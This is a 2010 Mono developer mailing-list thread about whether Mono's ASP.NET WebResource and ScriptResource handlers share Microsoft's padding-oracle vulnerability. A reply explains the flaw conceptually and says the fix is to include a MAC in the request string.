Based on code inspection it looks to me like Mono is partially vulnerable. There are/were two basic problems with the MS implementation:
1) when an incorrect string is passed in the 'd' paramater to WebResource.axd, which is processed by System.Web.Handlers.WebResourceHandler.ProcessRequest, the exception that is thrown depends on whether the padding in the decrypted string is correct or not. This is the padding oracle that lets an attacker encrypt (or decrypt) arbitrary strings with the key used by the oracle. Mono's implementation appears to also have this problem in both WebResourceHandler and ScriptResourceHandler. The fix for this is to include a MAC as part of the request string. 2) given an encrypted string representing a file ScriptResource.axd, which is processed by System.Web.Handlers.ScriptResourceHandler.ProcessRequest, allows for the download of arbitrary files from within the applications Virtual Path. Mono's implementation doesn't appear to allow for anything other than embedded resources to be downloaded through this path and so isn't vulnerable. Dan Witt On Fri, Oct 1, 2010 at 2:07 PM, Sebastien Pouliot < sebastien.poul...@gmail.com> wrote: > My previous answer still stand. Watch the following link for updates: > http://www.mono-project.com/Vulnerabilities > > On Fri, 2010-10-01 at 12:52 +0200, Tomi wrote: > > Any update on this issue? The MS patch is already out. Some background > > information: > > > http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx > > > http://weblogs.asp.net/scottgu/archive/2010/09/30/asp-net-security-fix-now-on-windows-update.aspx > > > > On 19 September 2010 11:47, Tomi <bosak.to...@gmail.com> wrote: > > > Hi folks, > > > > > > is mono also affected by this security vulnerability? (ScottGu: "This > > > vulnerability is in our ASP.NET implementation (and will be fixed in a > > > patch). I'm not sure if Mono has the same bug.") > > > > > > > http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx > > > > > _______________________________________________ > > Mono-devel-list mailing list > > Mono-devel-list@lists.ximian.com > > http://lists.ximian.com/mailman/listinfo/mono-devel-list > > > _______________________________________________ > Mono-devel-list mailing list > Mono-devel-list@lists.ximian.com > http://lists.ximian.com/mailman/listinfo/mono-devel-list >
_______________________________________________ Mono-devel-list mailing list Mono-devel-list@lists.ximian.com http://lists.ximian.com/mailman/listinfo/mono-devel-list